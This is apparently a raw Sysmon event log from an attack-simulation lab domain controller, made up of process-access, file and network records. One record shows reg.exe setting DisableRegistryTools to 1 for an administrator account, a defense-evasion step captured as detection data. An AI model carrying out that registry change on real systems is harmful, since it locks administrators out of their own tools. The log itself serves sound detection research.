dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010882Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:25.191{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010881Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:25.191{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010880Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:25.191{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010879Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:25.191{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010878Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:25.191{266CAFBE-64C4-6064-9C00-00000000AE01}46204256C:\Windows\system32\sihost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010877Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:25.019{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\Syst
em32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010876Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:25.019{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010875Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:25.019{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 354300x800000000000000010886Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:25.491{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53711-false10.0.1.12-8000- 23542300x800000000000000010885Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:26.488{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B0AA599E42E2FA5EEDA290FF48B262F,SHA256=04AD42ACDE96B32B2E60AABF9E087B1A75BDCEB5264C0CD736025219CCF89E27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010887Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:27.519{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EB862D2A8C93E46B7A35E3ED821ABB0,SHA256=B41D33706EA137AA5A7D0EE39D82396B152A75DB999996335092B12B9CBA2883,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010888Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:28.550{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E2CBA11F636BCB81A965F28B1BE5217,SHA256=4B0828FCE06649B082D7DF596EE79CEA63049181BE91ADEB8BD796FA957CB04C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010895Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:29.613{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57947BBCF9E4170A00FEA8B73B884922,SHA256=6CBED16BBACEAC58ACA94B33F7EC88DFABC8B292E5F63CC69FA20C105FCF9CDB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010894Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:29.597{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010893Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:29.597{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010892Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:29.581{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010891Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:29.581{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010890Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:29.581{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010889Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:29.581{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010896Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:30.628{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB1BE1A933FFD554A7A2B7C06F04A750,SHA256=F57B85680693BFA45C72CD181DCFE6D11E19A80E689AE553C45595010A67922E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010897Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:31.644{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC3A328B338C42313E76739CE8EEA9D0,SHA256=70124F85AD1755BCFBBDDAF08C6BE6E9B317A9AE094FBF6A44FF792C1BB9B481,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010908Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:32.659{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3090A02854A10B346ADA5F13028DC50,SHA256=FC5689477942692E31CFEA31323D4B3D9D052EC5DB6A6BDA1837739C1DA0EA18,IMPHASH=00000000000000000000000000000000falsetrue 
354300x800000000000000010907Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:30.632{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53712-false10.0.1.12-8000- 13241300x800000000000000010906Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:09:32.128{266CAFBE-667C-6064-7301-00000000AE01}2852C:\Windows\SysWOW64\reg.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryToolsDWORD (0x00000001) 10341000x800000000000000010905Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:32.128{266CAFBE-65AC-6064-5101-00000000AE01}55606832C:\Windows\system32\conhost.exe{266CAFBE-667C-6064-7301-00000000AE01}2852C:\Windows\SysWOW64\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010904Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:32.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010903Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:32.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010902Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:32.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010901Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:32.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010900Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
